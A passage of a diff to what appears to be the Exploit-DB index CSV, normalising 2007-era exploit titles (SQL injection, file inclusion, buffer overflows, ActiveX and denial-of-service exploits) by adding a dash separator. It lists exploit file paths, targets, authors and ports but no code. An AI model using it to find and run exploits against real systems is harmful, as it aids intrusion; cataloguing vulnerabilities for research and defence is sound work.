4149,platforms/windows/dos/4149.html,"EnjoySAP ActiveX rfcguisink.rfcguisink.1 - Remote Heap Overflow PoC",2007-07-05,"Mark Litchfield",windows,dos,0 -4150,platforms/php/webapps/4150.txt,"VRNews 1.1.1 (admin.php) Remote Permission Bypass",2007-07-05,R4M!,php,webapps,0 +4150,platforms/php/webapps/4150.txt,"VRNews 1.1.1 - (admin.php) Remote Permission Bypass",2007-07-05,R4M!,php,webapps,0 4151,platforms/php/webapps/4151.sh,"AsteriDex <= 3.0 - Remote (callboth.php) Remote Code Execution Exploit",2007-07-05,"Carl Livitt",php,webapps,0 4152,platforms/windows/remote/4152.py,"ViRC 2.0 - (JOIN Response) Remote SEH Overwrite Exploit (0Day)",2007-07-06,h07,windows,remote,0 -4153,platforms/php/webapps/4153.txt,"phpVID 0.9.9 (categories_type.php cat) SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 +4153,platforms/php/webapps/4153.txt,"phpVID 0.9.9 - (categories_type.php cat) SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 4154,platforms/php/webapps/4154.txt,"eMeeting Online Dating Software 5.2 - SQL Injection Vulnerabilities",2007-07-06,t0pP8uZz,php,webapps,0 4155,platforms/windows/remote/4155.html,"HP Digital Imaging (hpqvwocx.dll 2.1.0.556) - SaveToFile() Exploit",2007-07-06,shinnai,windows,remote,0 4156,platforms/php/webapps/4156.txt,"limesurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps,0 4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 WebTools Remote SEH overwrite Exploit",2007-07-07,Heretic2,windows,remote,9999 4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote BoF Exploit",2007-07-07,nitr0us,windows,remote,0 -4159,platforms/php/webapps/4159.txt,"GameSiteScript <= 3.1 (profile id) Remote SQL Injection",2007-07-07,Xenduer77,php,webapps,0 +4159,platforms/php/webapps/4159.txt,"GameSiteScript <= 3.1 - (profile id) Remote SQL Injection",2007-07-07,Xenduer77,php,webapps,0 4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods Exploit",2007-07-07,shinnai,windows,remote,0 -4161,platforms/php/webapps/4161.txt,"FlashGameScript <= 1.7 (user) Remote SQL Injection",2007-07-08,Xenduer77,php,webapps,0 +4161,platforms/php/webapps/4161.txt,"FlashGameScript <= 1.7 - (user) Remote SQL Injection",2007-07-08,Xenduer77,php,webapps,0 4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)",2007-07-08,Xpl017Elz,linux,remote,80 4163,platforms/php/webapps/4163.php,"AV Tutorial Script 1.0 - Remote User Pass Change Exploit",2007-07-08,Dj7xpl,php,webapps,0 -4164,platforms/php/webapps/4164.txt,"Aigaion <= 1.3.3 (topic topic_id) Remote SQL Injection",2007-07-09,CypherXero,php,webapps,0 +4164,platforms/php/webapps/4164.txt,"Aigaion <= 1.3.3 - (topic topic_id) Remote SQL Injection",2007-07-09,CypherXero,php,webapps,0 4165,platforms/windows/local/4165.c,"WinPcap 4.0 - NPF.SYS Privilege Elevation PoC Exploit",2007-07-10,"Mario Ballano Bárcena",windows,local,0 -4166,platforms/php/webapps/4166.txt,"vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection",2007-07-10,t0pP8uZz,php,webapps,0 -4167,platforms/php/webapps/4167.txt,"OpenLD <= 1.2.2 (index.php id) Remote SQL Injection",2007-07-10,CypherXero,php,webapps,0 +4166,platforms/php/webapps/4166.txt,"vBulletin Mod RPG Inferno 2.4 - (inferno.php) SQL Injection",2007-07-10,t0pP8uZz,php,webapps,0 +4167,platforms/php/webapps/4167.txt,"OpenLD <= 1.2.2 - (index.php id) Remote SQL Injection",2007-07-10,CypherXero,php,webapps,0 4168,platforms/windows/dos/4168.vbs,"Sun Java WebStart JNLP Stack Buffer Overflow Exploit PoC",2007-07-10,ZhenHan.Liu,windows,dos,0 -4169,platforms/php/webapps/4169.txt,"FlashBB <= 1.1.8 (sendmsg.php) Remote File Inclusion",2007-07-10,Kw3[R]Ln,php,webapps,0 +4169,platforms/php/webapps/4169.txt,"FlashBB <= 1.1.8 - (sendmsg.php) Remote File Inclusion",2007-07-10,Kw3[R]Ln,php,webapps,0 4170,platforms/windows/remote/4170.html,"Program Checker (sasatl.dll 1.5.0.531) Javascript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0 4171,platforms/php/webapps/4171.pl,"Mail Machine <= 3.989 - Local File Inclusion Exploit",2007-07-10,"H4 / XPK",php,webapps,0 4172,platforms/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - IPv6_Getsockopt_Sticky Memory Leak Proof of Concept",2007-07-10,dreyer,linux,local,0 4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution",2007-07-11,jmp-esp,php,webapps,0 -4174,platforms/php/webapps/4174.txt,"PsNews 1.1 (show.php newspath) Local File Inclusion",2007-07-12,irk4z,php,webapps,0 +4174,platforms/php/webapps/4174.txt,"PsNews 1.1 - (show.php newspath) Local File Inclusion",2007-07-12,irk4z,php,webapps,0 4175,platforms/multiple/dos/4175.php,"PHP 5.2.3 - bz2 com_print_typeinfo() Denial of Service Exploit",2007-07-12,shinnai,multiple,dos,0 4176,platforms/windows/remote/4176.html,"SecureBlackbox (PGPBBox.dll 5.1.0.112) - Arbitrary Data Write Exploit",2007-07-12,callAX,windows,remote,0 4177,platforms/windows/remote/4177.html,"Program Checker (sasatl.dll 1.5.0.531) DebugMsgLog Heap Spraying Exploit",2007-07-12,callAX,windows,remote,0 @@ -3829,21 +3829,21 @@ id,file,description,date,author,platform,type,port 4179,platforms/php/webapps/4179.php,"MkPortal <= 1.1.1 reviews / gallery modules SQL Injection Exploit",2007-07-12,Coloss,php,webapps,0 4180,platforms/php/webapps/4180.txt,"MKPortal NoBoard Module (BETA) Remote File Inclusion",2007-07-14,g00ns,php,webapps,0 4181,platforms/multiple/dos/4181.php,"PHP 5.2.3 - glob() Denial of Service Exploit",2007-07-14,shinnai,multiple,dos,0 -4182,platforms/php/webapps/4182.txt,"CMScout <= 1.23 (index.php) Remote SQL Injection",2007-07-14,g00ns,php,webapps,0 +4182,platforms/php/webapps/4182.txt,"CMScout <= 1.23 - (index.php) Remote SQL Injection",2007-07-14,g00ns,php,webapps,0 4183,platforms/php/webapps/4183.txt,"eSyndiCat Directory Software Multiple SQL Injection Vulnerabilities",2007-07-14,d3v1l,php,webapps,0 -4184,platforms/php/webapps/4184.txt,"Realtor 747 (index.php categoryid) Remote SQL Injection Vulnerbility",2007-07-14,t0pP8uZz,php,webapps,0 +4184,platforms/php/webapps/4184.txt,"Realtor 747 - (index.php categoryid) Remote SQL Injection Vulnerbility",2007-07-14,t0pP8uZz,php,webapps,0 4185,platforms/php/webapps/4185.txt,"Prozilla Directory Script - (directory.php cat_id) SQL Injection Vulnerbility",2007-07-14,t0pP8uZz,php,webapps,0 -4186,platforms/php/webapps/4186.txt,"paFileDB 3.6 (search.php) Remote SQL Injection",2007-07-14,pUm,php,webapps,0 +4186,platforms/php/webapps/4186.txt,"paFileDB 3.6 - (search.php) Remote SQL Injection",2007-07-14,pUm,php,webapps,0 4187,platforms/php/webapps/4187.txt,"Traffic Stats (referralUrl.php offset) Remote SQL Injection Vulnerbility",2007-07-16,t0pP8uZz,php,webapps,0 4188,platforms/windows/remote/4188.txt,"Flash Player/Plugin Video - File Parsing Remote Code Execution PoC",2007-07-16,yunshu,windows,remote,0 4189,platforms/php/webapps/4189.txt,"Expert Advisior (index.php id) Remote SQL Injection Vulnerbility",2007-07-17,t0pP8uZz,php,webapps,0 4190,platforms/windows/remote/4190.html,"Data Dynamics ActiveBar ActiveX (actbar3.ocx <= 3.1) Insecure Methods",2007-07-17,shinnai,windows,remote,0 4191,platforms/php/webapps/4191.txt,"Pictures Rating - (index.php msgid) Remote SQL Injection Vulnerbility",2007-07-18,t0pP8uZz,php,webapps,0 -4192,platforms/php/webapps/4192.htm,"Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit",2007-07-18,ajann,php,webapps,0 -4193,platforms/php/webapps/4193.txt,"QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection",2007-07-18,meoconx,php,webapps,0 +4192,platforms/php/webapps/4192.htm,"Vivvo CMS <= 3.4 - (index.php) Remote BLIND SQL Injection Exploit",2007-07-18,ajann,php,webapps,0 +4193,platforms/php/webapps/4193.txt,"QuickEStore <= 8.2 - (insertorder.cfm) Remote SQL Injection",2007-07-18,meoconx,php,webapps,0 4194,platforms/php/webapps/4194.txt,"Joomla Component Expose <= RC35 - Remote File Upload",2007-07-18,"Cold Zero",php,webapps,0 4195,platforms/php/webapps/4195.txt,"BBS E-Market (postscript.php p_mode) Remote File Inclusion",2007-07-18,mozi,php,webapps,0 -4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 / 1.4.8 / 2.2.1 chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0 +4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 - / 1.4.8 / 2.2.1 chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0 4197,platforms/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 - (link_main.php) RFI",2007-07-18,bd0rk,php,webapps,0 4198,platforms/asp/webapps/4198.txt,"A-shop <= 0.70 - Remote File Deletion",2007-07-18,Timq,asp,webapps,0 4199,platforms/php/webapps/4199.txt,"Md-Pro <= 1.0.8x (Topics topicid) Remote SQL Injection",2007-07-18,anonymous,php,webapps,0 @@ -3851,14 +3851,14 @@ id,file,description,date,author,platform,type,port 4201,platforms/php/webapps/4201.txt,"Joomla Component Pony Gallery <= 1.5 - SQL Injection",2007-07-19,ajann,php,webapps,0 4203,platforms/multiple/local/4203.sql,"Oracle 9i/10g Evil Views - Change Passwords Exploit",2007-07-19,bunker,multiple,local,0 4204,platforms/windows/local/4204.php,"PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit",2007-07-20,shinnai,windows,local,0 -4205,platforms/windows/dos/4205.pl,"TeamSpeak 2.0 (Windows Release) Remote Denial of Service Exploit",2007-07-20,"YAG KOHHA",windows,dos,0 +4205,platforms/windows/dos/4205.pl,"TeamSpeak 2.0 - (Windows Release) Remote Denial of Service Exploit",2007-07-20,"YAG KOHHA",windows,dos,0 4206,platforms/php/webapps/4206.txt,"Blog System 1.x - (index.php news_id) Remote SQL Injection",2007-07-20,t0pP8uZz,php,webapps,0 4207,platforms/windows/remote/4207.py,"Lotus Domino IMAP4 Server 6.5.4 - Remote Buffer Overflow Exploit",2007-07-20,"dmc and prdelka",windows,remote,143 4208,platforms/windows/remote/4208.html,"Data Dynamics ActiveReport ActiveX (actrpt2.dll <= 2.5) Inscure Method",2007-07-21,shinnai,windows,remote,0 4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition (displaycat catid) SQL Injection Vulnerbility",2007-07-21,t0pP8uZz,php,webapps,0 4210,platforms/php/webapps/4210.txt,"RGameScript Pro (page.php id) Remote File Inclusion",2007-07-21,Warpboy,php,webapps,0 4211,platforms/php/webapps/4211.htm,"JBlog 1.0 Create / Delete Admin Authentication Bypass Exploit",2007-07-21,s4mi,php,webapps,0 -4212,platforms/php/webapps/4212.txt,"Joomla! CMS 1.5 beta 2 (search) Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps,0 +4212,platforms/php/webapps/4212.txt,"Joomla! CMS 1.5 beta 2 - (search) Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps,0 4213,platforms/php/webapps/4213.txt,"bwired (index.php newsID) Remote SQL Injection",2007-07-22,g00ns,php,webapps,0 4214,platforms/windows/remote/4214.html,"Zenturi NixonMyPrograms Class (sasatl.dll 1.5.0.531) - Remote BoF",2007-07-23,shinnai,windows,remote,0 4215,platforms/windows/dos/4215.pl,"Microsoft Windows - Explorer.exe Gif Image Denial of Service Exploit",2007-07-23,DeltahackingTEAM,windows,dos,0 @@ -3871,7 +3871,7 @@ id,file,description,date,author,platform,type,port 4222,platforms/windows/remote/4222.c,"Windows RSH daemon 1.7 - Remote Buffer Overflow Exploit",2007-07-24,"Joey Mengele",windows,remote,514 4223,platforms/windows/remote/4223.pl,"IPSwitch IMail Server 2006 - SEARCH Remote Stack Overflow Exploit",2007-07-25,ZhenHan.Liu,windows,remote,143 4224,platforms/php/webapps/4224.txt,"Webyapar 2.0 - Multiple Remote SQL Injection Vulnerabilities",2007-07-25,bypass,php,webapps,0 -4225,platforms/php/webapps/4225.txt,"IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection",2007-07-25,xssvgamer,php,webapps,0 +4225,platforms/php/webapps/4225.txt,"IndexScript <= 2.8 - (show_cat.php cat_id) SQL Injection",2007-07-25,xssvgamer,php,webapps,0 4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0 4227,platforms/windows/dos/4227.php,"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",2007-07-26,r0ut3r,windows,dos,0 4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote Overflow Exploit",2007-07-26,ZhenHan.Liu,windows,remote,143 @@ -3885,50 +3885,50 @@ id,file,description,date,author,platform,type,port 4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0 4237,platforms/windows/remote/4237.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Command Exec Exploit",2007-07-27,h07,windows,remote,0 4238,platforms/php/webapps/4238.txt,"Adult Directory (cat_id) Remote SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0 -4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 (comments_get.asp id) Remote SQL Injection",2007-07-28,g00ns,asp,webapps,0 +4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 - (comments_get.asp id) Remote SQL Injection",2007-07-28,g00ns,asp,webapps,0 4240,platforms/windows/remote/4240.html,"VMware IntraProcessLogging.dll 5.5.3.42958 - Arbitrary Data Write Exploit",2007-07-28,callAX,windows,remote,0 4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites - (category.php cat) Remote SQL Injection",2007-07-28,t0pP8uZz,php,webapps,0 -4242,platforms/php/webapps/4242.php,"LinPHA <= 1.3.1 (new_images.php) Remote Blind SQL Injection Exploit",2007-07-29,EgiX,php,webapps,0 +4242,platforms/php/webapps/4242.php,"LinPHA <= 1.3.1 - (new_images.php) Remote Blind SQL Injection Exploit",2007-07-29,EgiX,php,webapps,0 4243,platforms/linux/remote/4243.c,"CoreHTTP 0.5.3alpha (httpd) - Remote Buffer Overflow Exploit",2007-07-29,vade79,linux,remote,80 -4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 (vielib.dll 2.2.5.42958) Remode Code Execution Exploit",2007-07-29,callAX,windows,remote,0 +4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 - (vielib.dll 2.2.5.42958) Remode Code Execution Exploit",2007-07-29,callAX,windows,remote,0 4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 CreateProcess Remote Code Execution Exploit",2007-07-30,callAX,windows,remote,0 4246,platforms/php/webapps/4246.txt,"wolioCMS Auth Bypass / Remote SQL Injection Vulnerabilities",2007-07-30,k1tk4t,php,webapps,0 4247,platforms/windows/remote/4247.c,"Borland Interbase <= 2007 SP1 Create-Request Remote Overflow Exploit",2007-07-30,BackBone,windows,remote,3050 -4248,platforms/php/webapps/4248.txt,"Joomla Component com_gmaps 1.00 (mapId) Remote SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0 +4248,platforms/php/webapps/4248.txt,"Joomla Component com_gmaps 1.00 - (mapId) Remote SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0 4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash Exploit",2007-07-31,tenkei_ev,multiple,dos,0 4250,platforms/windows/remote/4250.html,"Yahoo! Widget < 4.0.5 - GetComponentVersion() Remote Overflow Exploit",2007-07-31,lhoang8500,windows,remote,0 4251,platforms/windows/dos/4251.html,"Microsoft Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit",2007-07-31,DeltahackingTEAM,windows,dos,0 4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - (.mpr replay) Buffer Overflow Exploit",2007-08-01,n00b,windows,local,0 -4253,platforms/php/webapps/4253.pl,"paBugs <= 2.0 Beta 3 (main.php cid) Remote SQL Injection Exploit",2007-08-02,uimp,php,webapps,0 +4253,platforms/php/webapps/4253.pl,"paBugs <= 2.0 Beta 3 - (main.php cid) Remote SQL Injection Exploit",2007-08-02,uimp,php,webapps,0 4254,platforms/php/webapps/4254.txt,"AuraCMS - [Forum Module] Remote SQL Injection",2007-08-05,k1tk4t,php,webapps,0 4255,platforms/windows/remote/4255.html,"CHILKAT ASP String (CkString.dll <= 1.1) SaveToFile() Inscure Method",2007-08-05,shinnai,windows,remote,0 -4256,platforms/php/webapps/4256.pl,"Envolution <= 1.1.0 (topic) Remote SQL Injection Exploit",2007-08-05,k1tk4t,php,webapps,0 +4256,platforms/php/webapps/4256.pl,"Envolution <= 1.1.0 - (topic) Remote SQL Injection Exploit",2007-08-05,k1tk4t,php,webapps,0 4257,platforms/windows/local/4257.c,"Panda Antivirus 2008 - Local Privilege Escalation Exploit",2007-08-05,tarkus,windows,local,0 4258,platforms/php/webapps/4258.txt,"la-nai CMS 1.2.14 - Multiple Remote SQL Injection Vulnerabilities",2007-08-06,k1tk4t,php,webapps,0 -4259,platforms/windows/remote/4259.txt,"Microsoft Visual 6 (VDT70.DLL NotSafe) Stack Overflow Exploit",2007-08-06,DeltahackingTEAM,windows,remote,0 +4259,platforms/windows/remote/4259.txt,"Microsoft Visual 6 - (VDT70.DLL NotSafe) Stack Overflow Exploit",2007-08-06,DeltahackingTEAM,windows,remote,0 4260,platforms/multiple/dos/4260.php,"PHP mSQL (msql_connect) Local Buffer Overflow PoC",2007-08-06,NetJackal,multiple,dos,0 -4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0 +4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - (showpage.cgi p) Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0 4262,platforms/windows/local/4262.cpp,"Live for Speed S1/S2/Demo - (.ply) Buffer Overflow Exploit",2007-08-06,n00b,windows,local,0 4263,platforms/windows/local/4263.cpp,"Live for Speed S1/S2/Demo - (.spr) Buffer Overflow Exploit",2007-08-06,n00b,windows,local,0 4264,platforms/cgi/webapps/4264.txt,"CartWeaver (Details.cfm ProdID) Remote SQL Injection",2007-08-06,meoconx,cgi,webapps,0 4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory (directory.php cat) SQL Injection Vulnerbility",2007-08-06,t0pP8uZz,php,webapps,0 4266,platforms/multiple/remote/4266.py,"BIND 9 0.3beta - DNS Cache Poisoning Exploit",2007-08-07,posedge,multiple,remote,0 -4267,platforms/php/webapps/4267.txt,"PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0 -4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 (format_menue) Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 +4267,platforms/php/webapps/4267.txt,"PhpHostBot <= 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0 +4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - (format_menue) Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 4269,platforms/php/webapps/4269.txt,"frontaccounting 1.12 build 31 - Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 4270,platforms/windows/local/4270.php,"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",2007-08-08,Inphex,windows,local,0 -4271,platforms/php/webapps/4271.txt,"FishCart <= 3.2 RC2 (fc_example.php) Remote File Inclusion",2007-08-08,k1n9k0ng,php,webapps,0 +4271,platforms/php/webapps/4271.txt,"FishCart <= 3.2 RC2 - (fc_example.php) Remote File Inclusion",2007-08-08,k1n9k0ng,php,webapps,0 4272,platforms/windows/dos/4272.c,"Cisco IOS Next Hop Resolution Protocol (NHRP) Denial of Service Exploit",2007-08-09,"Martin Kluge",windows,dos,0 -4273,platforms/php/webapps/4273.txt,"Ncaster 1.7.2 (archive.php) Remote File Inclusion",2007-08-09,k1n9k0ng,php,webapps,0 +4273,platforms/php/webapps/4273.txt,"Ncaster 1.7.2 - (archive.php) Remote File Inclusion",2007-08-09,k1n9k0ng,php,webapps,0 4274,platforms/windows/local/4274.php,"PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit (EDI)",2007-08-09,Inphex,windows,local,0 4275,platforms/php/webapps/4275.php,"Php Blue Dragon CMS 3.0.0 - Remote SQL Injection Exploit",2007-08-10,Kacper,php,webapps,0 4276,platforms/php/webapps/4276.txt,"php blue dragon CMS 3.0.0 - Remote File Inclusion",2007-08-10,Kacper,php,webapps,0 4277,platforms/php/webapps/4277.php,"Php Blue Dragon CMS 3.0.0 - Remote Code Execution Exploit",2007-08-10,Kacper,php,webapps,0 -4278,platforms/php/webapps/4278.txt,"Pixlie 1.7 (pixlie.php root) Remote File Disclosure",2007-08-10,Rizgar,php,webapps,0 -4279,platforms/windows/remote/4279.html,"Microsoft DXMedia SDK 6 (SourceUrl) ActiveX Remote Code Execution",2007-08-10,h07,windows,remote,0 +4278,platforms/php/webapps/4278.txt,"Pixlie 1.7 - (pixlie.php root) Remote File Disclosure",2007-08-10,Rizgar,php,webapps,0 +4279,platforms/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - (SourceUrl) ActiveX Remote Code Execution",2007-08-10,h07,windows,remote,0 4280,platforms/windows/remote/4280.pl,"Savant 3.1 Get Request Remote Overflow Exploit (Universal)",2007-08-12,"Jacopo Cervini",windows,remote,80 4281,platforms/windows/dos/4281.c,"WengoPhone 2.x SIP Phone Remote Denial of Service Exploit",2007-08-13,ZwelL,windows,dos,0 -4282,platforms/php/webapps/4282.txt,"SOTEeSKLEP <= 3.5RC9 (file) Remote File Disclosure",2007-08-13,dun,php,webapps,0 +4282,platforms/php/webapps/4282.txt,"SOTEeSKLEP <= 3.5RC9 - (file) Remote File Disclosure",2007-08-13,dun,php,webapps,0 4283,platforms/windows/remote/4283.pl,"Racer 0.5.3 beta 5 - Remote Buffer Overflow Exploit",2007-08-13,n00b,windows,remote,26000 4284,platforms/php/webapps/4284.txt,"Prozilla Webring Website Script (category.php cat) Remote SQL Injection",2007-08-13,t0pP8uZz,php,webapps,0 4285,platforms/windows/dos/4285.c,"CounterPath X-Lite 3.x SIP phone Remote Denial of Service Exploit",2007-08-13,ZwelL,windows,dos,0 @@ -3943,30 +3943,30 @@ id,file,description,date,author,platform,type,port 4294,platforms/windows/dos/4294.pl,"Mercury SMTPD Remote Preauth Stack Based Overrun PoC",2007-08-18,eliteboy,windows,dos,0 4295,platforms/php/webapps/4295.txt,"Squirrelcart <= 1.x.x - (cart.php) Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - Remote SQL Injection",2007-08-20,k1tk4t,php,webapps,0 -4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 (3 SIP messages) Remote Denial of Service Exploit",2007-08-21,MADYNES,hardware,dos,0 -4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 (10 SIP messages) Remote Denial of Service Exploit",2007-08-21,MADYNES,hardware,dos,0 +4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - (3 SIP messages) Remote Denial of Service Exploit",2007-08-21,MADYNES,hardware,dos,0 +4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - (10 SIP messages) Remote Denial of Service Exploit",2007-08-21,MADYNES,hardware,dos,0 4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module (uacomx.ocx 2.0.1) Remote BoF Exploit",2007-08-21,rgod,windows,remote,0 -4300,platforms/php/webapps/4300.txt,"litecommerce 2004 (category_id) Remote SQL Injection",2007-08-21,k1tk4t,php,webapps,0 +4300,platforms/php/webapps/4300.txt,"litecommerce 2004 - (category_id) Remote SQL Injection",2007-08-21,k1tk4t,php,webapps,0 4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Overflow Exploit",2007-08-22,ZhenHan.Liu,windows,remote,25 4302,platforms/windows/local/4302.php,"PHP <= 5.2.3 - (php_win32sti) Local Buffer Overflow Exploit",2007-08-22,Inphex,windows,local,0 4303,platforms/windows/local/4303.php,"PHP <= 5.2.3 - (php_win32sti) Local Buffer Overflow Exploit (2)",2007-08-22,NetJackal,windows,local,0 4304,platforms/windows/dos/4304.php,"PHP 5.2.3 - php_ntuser ntuser_getuserlist() Local Buffer Overflow PoC",2007-08-23,shinnai,windows,dos,0 -4305,platforms/php/webapps/4305.txt,"Joomla Component NeoRecruit <= 1.4 (id) SQL Injection",2007-08-23,ajann,php,webapps,0 +4305,platforms/php/webapps/4305.txt,"Joomla Component NeoRecruit <= 1.4 - (id) SQL Injection",2007-08-23,ajann,php,webapps,0 4306,platforms/php/webapps/4306.txt,"Mambo Component RemoSitory (cat) Remote SQL Injection",2007-08-23,ajann,php,webapps,0 4307,platforms/php/webapps/4307.txt,"Joomla Component RSfiles <= 1.0.2 - (path) File Download",2007-08-23,ajann,php,webapps,0 4308,platforms/php/webapps/4308.txt,"Joomla Component Nice Talk <= 0.9.3 - (tagid) SQL Injection",2007-08-23,ajann,php,webapps,0 -4309,platforms/php/webapps/4309.txt,"Joomla Component EventList <= 0.8 (did) SQL Injection",2007-08-23,ajann,php,webapps,0 +4309,platforms/php/webapps/4309.txt,"Joomla Component EventList <= 0.8 - (did) SQL Injection",2007-08-23,ajann,php,webapps,0 4310,platforms/php/webapps/4310.txt,"Joomla Component BibTeX <= 1.3 - Remote Blind SQL Injection Exploit",2007-08-23,ajann,php,webapps,0 4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit",2007-08-23,NetJackal,windows,local,0 4312,platforms/linux/remote/4312.c,"ProFTPD 1.x (module mod_tls) - Remote Buffer Overflow Exploit",2007-08-24,netris,linux,remote,21 -4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit",2007-08-25,k1tk4t,php,webapps,0 +4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 - (search) Remote Blind SQL Injection Exploit",2007-08-25,k1tk4t,php,webapps,0 4314,platforms/windows/local/4314.php,"PHP Perl Extension Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server Preauth Remote Buffer Overflow Exploit",2007-08-25,"Joxean Koret",linux,remote,389 4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Pre-Auth EIP Overwrite Exploit",2007-08-26,Heretic2,windows,remote,25 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - (activateuser.php) Local File Inclusion",2007-08-26,bd0rk,php,webapps,0 -4318,platforms/windows/dos/4318.php,"PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (Win32)",2007-08-27,boecke,windows,dos,0 +4318,platforms/windows/dos/4318.php,"PHP <= 5.2.0 - (php_iisfunc.dll) Local Buffer Overflow PoC (Win32)",2007-08-27,boecke,windows,dos,0 4319,platforms/hardware/dos/4319.pl,"Thomson SIP phone ST 2030 - Remote Denial of Service Exploit",2007-08-27,MADYNES,hardware,dos,0 -4320,platforms/php/webapps/4320.txt,"SomeryC <= 0.2.4 (include.php skindir) Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0 +4320,platforms/php/webapps/4320.txt,"SomeryC <= 0.2.4 - (include.php skindir) Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0 4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow Exploit (0Day)",2007-08-27,bannedit,linux,remote,0 4322,platforms/windows/remote/4322.html,"NVR SP2 2.0 (nvUnifiedControl.dll 1.1.45.0) - SetText() Remote Exploit",2007-08-28,shinnai,windows,remote,0 4323,platforms/windows/remote/4323.html,"NVR SP2 2.0 (nvUtility.dll 1.0.14.0) - SaveXMLFile() Inscure Method",2007-08-27,shinnai,windows,remote,0 @@ -3974,34 +3974,34 @@ id,file,description,date,author,platform,type,port 4325,platforms/windows/local/4325.php,"XAMPP for Windows 1.6.3a - Local Privilege Escalation Exploit",2007-08-27,Inphex,windows,local,0 4326,platforms/php/webapps/4326.txt,"Arcadem 2.01 - Remote SQL Injection / RFI Vulnerabilties",2007-08-27,SmOk3,php,webapps,0 4327,platforms/php/webapps/4327.txt,"WBB2-Addon: Acrotxt 1.0 - (show) Remote SQL Injection",2007-08-27,D4m14n,php,webapps,0 -4328,platforms/windows/remote/4328.html,"Postcast Server Pro 3.0.61 / Quiksoft EasyMail (emsmtp.dll 6.0.1) BoF",2007-08-28,rgod,windows,remote,0 -4329,platforms/php/webapps/4329.txt,"Micro CMS 3.5 (revert-content.php) Remote SQL Injection",2007-08-28,"not sec group",php,webapps,0 -4330,platforms/php/webapps/4330.txt,"ACG News 1.0 (aid/catid) Remote SQL Injection 